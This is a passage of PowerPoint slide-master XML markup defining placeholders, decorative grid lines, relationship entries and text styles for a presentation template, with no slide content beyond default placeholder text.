            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="62484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400">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rectangle 1094"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6248400"/>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1400">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rectangle 1095"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="62484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1400">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AC48AED5-54A9-4F61-B3D7-DC7EE00B78FD}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>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524000"/>
            <a:ext cx="39243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14900" y="1524000"/>
            <a:ext cx="39243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p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F676629F-7297-4868-87FD-440918B37AF4}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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96050" y="304800"/>
            <a:ext cx="1962150" cy="5943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304800"/>
            <a:ext cx="5734050" cy="5943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p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{77ABE521-EBB8-432C-B96F-1FC2A10F5197}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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772400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>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648200" y="1600200"/>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772400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>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lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D88BAEA8-FC63-4247-9526-73B2A6DFE614}" type="slidenum">
              <a:rPr lang="en-GB"/>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68D278D2-38CE-4121-851D-643D8E14E71F}" type="slidenum">
              <a:rPr lang="en-GB"/>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fld id="{1F9CA2B5-450C-4A09-BD91-356781BA2A1D}" type="slidenum">
              <a:rPr lang="en-GB"/>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fld id="{D8964064-63B1-4F42-9962-8490834BF0AD}" type="slidenum">
              <a:rPr lang="en-GB"/>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1.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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><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theme" Target="../theme/theme3.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image" Target="../media/image1.png"/><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68034" name="Group 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-76200"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1068035" name="Group 3"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1068036" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="192"/>
                <a:ext cx="5760" cy="4032"/>
                <a:chOff x="0" y="192"/>
                <a:chExt cx="5760" cy="4032"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068037" name="Line 5"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="192"/>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38" name="Line 6"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="384"/>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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="576"/>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40" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="768"/>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41" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="960"/>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42" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="1152"/>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43" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="1344"/>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44" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="1536"/>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45" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="1728"/>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46" name="Line 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="1920"/>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47" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="2112"/>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48" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="2304"/>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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="2496"/>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50" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="2688"/>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51" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="2880"/>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52" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="3072"/>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53" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="3264"/>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54" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="3456"/>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55" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="3648"/>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56" name="Line 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="3840"/>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57" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="4032"/>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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="4224"/>
                  <a:ext cx="5760" cy="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grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1068059" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="192" y="0"/>
                <a:ext cx="5376" cy="4320"/>
                <a:chOff x="192" y="0"/>
                <a:chExt cx="5376" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="192"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61" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="384"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62" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="576"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63" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="768"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64" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="960"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65" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="1152"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66" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="1344"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67" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="1536"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68" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="1728"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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="1920"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70" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="2112"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71" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="2304"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72" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="2496"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73" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="2688"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74" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="2880"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75" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="3072"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76" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="3264"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77" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="3456"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78" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="3648"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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="3840"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80" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="4032"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81" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="4224"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82" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="4416"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83" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="4608"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84" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="4800"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85" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="4992"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86" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="5184"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87" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="5376"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sp>
              <p:nvSpPr>
                <p:cNvPr id="1068088" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="5568" y="0"/>
                  <a:ext cx="0" cy="4320"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:pattFill prst="pct30">
                    <a:fgClr>
                      <a:schemeClr val="folHlink"/>
                    </a:fgClr>
                    <a:bgClr>
                      <a:schemeClr val="bg1"/>
                    </a:bgClr>
                  </a:pattFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="2112" y="0"/>
              <a:ext cx="3648" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct60">
              <a:fgClr>
                <a:schemeClr val="folHlink"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="bg1"/>
              </a:bgClr>
            </a:pattFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="5568" y="0"/>
              <a:ext cx="0" cy="1488"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1068091" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="261" y="892"/>
              <a:ext cx="1124" cy="1464"/>
              <a:chOff x="96" y="916"/>
              <a:chExt cx="2208" cy="2876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="96" y="1037"/>
                <a:ext cx="2208" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="336" y="920"/>
                <a:ext cx="0" cy="2872"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="217" y="916"/>
                <a:ext cx="239" cy="239"/>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endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068095" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="838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GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068096" name="Rectangle 64" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="8001000" cy="5257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68100" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000"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a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E5803B63-52E0-420F-95D9-B26210208164}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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746" r:id="rId12"/>
    <p:sldLayoutId id="2147483747" r:id="rId13"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:title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itchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" fontAlgn="base">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fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="hlink"/>
        </a:buClr>
        <a:buSzPct val="110000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId15"/>
        </a:buBlip>
        <a:defRPr sz="24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itchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
